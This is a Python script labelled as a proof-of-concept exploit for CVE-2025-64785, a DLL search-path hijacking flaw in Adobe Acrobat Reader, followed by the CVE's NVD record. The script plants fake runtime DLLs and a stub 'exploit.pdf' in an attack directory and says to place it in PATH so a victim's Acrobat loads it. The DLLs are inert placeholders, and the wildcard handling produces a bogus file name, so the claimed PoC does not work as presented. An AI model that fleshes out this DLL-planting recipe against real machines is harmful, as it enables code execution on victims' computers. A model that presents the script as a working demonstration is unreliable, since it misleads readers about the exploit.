CVE-2025-64785

# CVE-2025-64785 PoC - Adobe Acrobat Reader Untrusted Search Path # This PoC demonstrates the concept of search path hijacking # Attackers would place a malicious DLL in a directory where Acrobat Reader searches import os import shutil from pathlib import Path def create_malicious_dll(dll_path): """ Create a placeholder for malicious DLL In real attack, this would be a DLL with malicious code """ # Simulated malicious DLL content dll_content = b'MZ' + b'\x00' * 100 # DLL signature placeholder with open(dll_path, 'wb') as f: f.write(dll_content) print(f"[+] Created malicious DLL at: {dll_path}") def setup_attack_directory(): """ Set up the attack environment 1. Create a directory with a malicious DLL 2. Place a malicious PDF that triggers the DLL loading """ attack_dir = Path("malicious_acrobat_payload") attack_dir.mkdir(exist_ok=True) # Common DLLs that Acrobat Reader might load common_dlls = ["msvcr120.dll", "msvcp120.dll", "api-ms-win-core*.dll"] for dll_name in common_dlls: dll_path = attack_dir / dll_name.replace("*", "core") create_malicious_dll(str(dll_path)) # Create a malicious PDF that references resources malicious_pdf = attack_dir / "exploit.pdf" malicious_pdf.write_bytes(b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n") print(f"[+] Created malicious PDF at: {malicious_pdf}") print(f"[!] Attack vector: Place this directory in PATH or current working dir") print(f"[!] When victim opens any PDF, Acrobat may load the malicious DLL") def cleanup(): """Clean up attack artifacts""" shutil.rmtree("malicious_acrobat_payload", ignore_errors=True) print("[*] Cleaned up attack artifacts") if __name__ == "__main__": print("CVE-2025-64785 PoC - Adobe Acrobat Reader Search Path Hijacking") print("=" * 70) setup_attack_directory() print("\n[!] Note: This is for educational purposes only") print("[!] Real exploitation requires specific DLL and PDF crafting")

{"cve": {"id": "CVE-2025-64785", "sourceIdentifier": "[email protected]", "published": "2025-12-09T21:15:58.940", "lastModified": "2026-04-28T15:39:46.100", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Acrobat Reader versions 24.001.30264, 20.005.30793, 25.001.20982, 24.001.30273, 20.005.30803 and earlier are affected by an Untrusted Search Path vulnerability that might allow attackers to execute arbitrary code in the context of the current user. If the application uses a search path to locate critical resources such as programs, an attacker could modify that search path to point to a malicious program, which the targeted application would then execute. Exploitation of this issue requires user interaction in that the user needs to open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*", "versionStartIncluding": "20.001.3005", "versionEndExcluding": "20.005.30838", "matchCriteriaId": "62657783-CFC7-4914-8107-3569B6A32F30"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:continuous:*:*:*", "versionEndExcluding": "25.001.20997", "matchCriteriaId": "788B5A24-7A26-481C-9AB5-63B0E1F95C22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:acrobat_reader:*:*:*:*:classic:*:*:*", "versionStartIncluding": "20.001.3005", "versionEndExcluding": "20.005.30838", "matchCriteriaId": "577F6321-7719-4DE4-ACE0-D56FA057BB0C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:*", "versionEndExcluding": "25.001.20997", "matchCriteriaId": "390032F7-4C10-4F88-8EBC-71506676BBB1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*", "versionStartIncluding": "24.001.20604", "versionEndExcluding": "24.001.30307", "matchCriteriaId": "C25C367B-6D27-4A56-9B78-3BC12D804D1E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*", "versionStartIncluding": "24.001.20604", "versionEndExcluding": "24.001.30308", "matchCriteriaId": "2605F01C-8F46-4E51-A9AC-A50ADDD131F4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/acrobat/apsb25-119.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}